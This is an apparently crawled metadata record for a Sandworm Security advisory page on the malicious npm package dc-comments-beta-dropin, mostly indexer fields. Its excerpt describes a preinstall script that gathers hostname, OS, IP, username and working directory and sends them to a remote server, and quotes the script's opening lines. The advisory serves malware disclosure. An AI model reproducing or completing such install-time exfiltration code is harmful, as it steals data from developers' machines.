id
type
0 (not classified)
status
21 (imported old-v2, waiting for another import)
review version
0
cleanup version
0
pending deletion
0 (-)
created at
2025-11-08 19:06:04
updated at
2025-11-08 19:06:05
url
https://sandworm.dev/npm/security-vulnerabilities/package/dc-comments-beta-dropin/
url length
82
url crc
40260
url crc32
1770560836
location type
1 (url matches target location, page_location is empty)
canonical status
2 (missing canonical tag in html)
canonical page id
-
domain id
domain tld
2265
domain parts
0
originating warc id
-
originating url
https://data.commoncrawl.org/crawl-data/CC-MAIN-2025-33/segments/1754151280076.69/warc/CC-MAIN-20250809045158-20250809075158-00615.warc.gz
source type
11 (CommonCrawl)
server ip
Publication date
2025-08-09 06:26:59
Fetch attempts
0
Original html size
32710
Normalized and saved size
32375
title
Latest Npm Package Security Vulnerabilities | Sandworm Security
excerpt
content
Sandworm scans all new Npm package versions for malicious install scripts.Scanning since October 2024.Follow our 𝕏 / Twitter feed for updates.dc-comments-beta-dropin↗️ View on Npm⚠️Found 4 vulnerable versions for package dc-comments-beta-dropin:2.25.03.44.03.60.02.385.0Detected: 2 Apr 2025Detected Date: 2 Apr 2025Affected Install Script: preinstallPackage Source: ↗️ View on NpmThe code collects sensitive system information, including the user's hostname, operating system details, local IP address, username, and current working directory, and then sends this data to a specified remote server through both HTTP GET and POST requests. Additionally, it falls back to sending data via WebSocket if the HTTP requests fail. This can potentially lead to unauthorized access to sensitive information and facilitate malicious activity.Install script:node index.jsInstall script code:const os = require("os"); const https = require("https"); // Check if running during `npm install` const isPreinstall =...
author
updated
1767787864
block type
0
extracted fields
105
extracted bits
featured image
title
full content
content was extracted heuristically
detected location
0
detected language
1 (English)
category id
Other [en] (231)
index version
2025123101
paywall score
0
spam phrases
0
text nonlatin
0
text cyrillic
0
text characters
9997
text words
1746
text unique words
272
text lines
1
text sentences
8
text paragraphs
1
text words per sentence
218
text matched phrases
8
text matched dictionaries
3
links self subdomains
0
links other subdomains
11
links other domains
7
links spam adult
0
links spam random
0
links spam expired
0
links ext activities
0
links ext ecommerce
0
links ext finance
0
links ext crypto
0
links ext booking
0
links ext news
0
links ext leaks
0
links ext ugc
9
links ext klim
0
links ext generic
0
image author
featured image